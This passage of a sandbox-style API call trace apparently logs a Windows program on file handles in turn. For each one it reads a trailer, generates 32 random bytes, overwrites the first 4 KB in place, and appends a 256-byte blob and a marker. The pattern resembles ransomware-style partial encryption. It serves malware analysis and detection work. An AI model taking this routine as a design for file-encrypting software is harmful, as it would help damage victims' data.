() returned 0x4f10000 [0086.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.334] GetProcessHeap () returned 0x4f10000 [0086.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0086.334] GetProcessHeap () returned 0x4f10000 [0086.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0086.334] GetProcessHeap () returned 0x4f10000 [0086.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0086.334] GetProcessHeap () returned 0x4f10000 [0086.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0086.334] SetFilePointerEx (in: hFile=0x9f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.334] WriteFile (in: hFile=0x9f4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0086.334] WriteFile (in: hFile=0x9f4, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0086.334] GetProcessHeap () returned 0x4f10000 [0086.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0086.334] GetProcessHeap () returned 0x4f10000 [0086.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0086.334] GetProcessHeap () returned 0x4f10000 [0086.334] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0086.334] CloseHandle (hObject=0x9f4) returned 1 [0086.337] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 159 [0086.337] SetFilePointerEx (in: hFile=0x9f8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.337] ReadFile (in: hFile=0x9f8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0086.337] SetFilePointerEx (in: hFile=0x9f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.337] GetProcessHeap () returned 0x4f10000 [0086.337] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0086.337] GetProcessHeap () returned 0x4f10000 [0086.337] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0086.337] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0086.337] GetProcessHeap () returned 0x4f10000 [0086.337] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0086.337] ReadFile (in: hFile=0x9f8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0086.389] SetFilePointerEx (in: hFile=0x9f8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.389] WriteFile (in: hFile=0x9f8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.389] GetProcessHeap () returned 0x4f10000 [0086.389] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.390] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.390] GetProcessHeap () returned 0x4f10000 [0086.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0086.391] GetProcessHeap () returned 0x4f10000 [0086.391] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.392] GetProcessHeap () returned 0x4f10000 [0086.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0086.393] GetProcessHeap () returned 0x4f10000 [0086.393] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0086.393] SetFilePointerEx (in: hFile=0x9f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.394] WriteFile (in: hFile=0x9f8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0086.394] WriteFile (in: hFile=0x9f8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0086.394] GetProcessHeap () returned 0x4f10000 [0086.394] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0086.394] GetProcessHeap () returned 0x4f10000 [0086.394] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0086.394] GetProcessHeap () returned 0x4f10000 [0086.394] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0086.394] CloseHandle (hObject=0x9f8) returned 1 [0086.395] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 160 [0086.395] SetFilePointerEx (in: hFile=0x9fc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.395] ReadFile (in: hFile=0x9fc, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0086.395] SetFilePointerEx (in: hFile=0x9fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.395] GetProcessHeap () returned 0x4f10000 [0086.395] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0086.395] GetProcessHeap () returned 0x4f10000 [0086.395] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0086.395] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0086.395] GetProcessHeap () returned 0x4f10000 [0086.395] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0086.395] ReadFile (in: hFile=0x9fc, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0086.447] SetFilePointerEx (in: hFile=0x9fc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.447] WriteFile (in: hFile=0x9fc, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0086.447] GetProcessHeap () returned 0x4f10000 [0086.447] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0086.447] GetProcessHeap () returned 0x4f10000 [0086.447] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.447] GetProcessHeap () returned 0x4f10000 [0086.447] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0086.447] GetProcessHeap () returned 0x4f10000 [0086.447] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.447] GetProcessHeap () returned 0x4f10000 [0086.447] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0086.447] GetProcessHeap () returned 0x4f10000 [0086.447] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.447] GetProcessHeap () returned 0x4f10000 [0086.447] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.447] GetProcessHeap () returned 0x4f10000 [0086.448] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.448] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.448] GetProcessHeap () returned 0x4f10000 [0086.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0086.449] GetProcessHeap () returned 0x4f10000 [0086.449] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0086.449] GetProcessHeap () 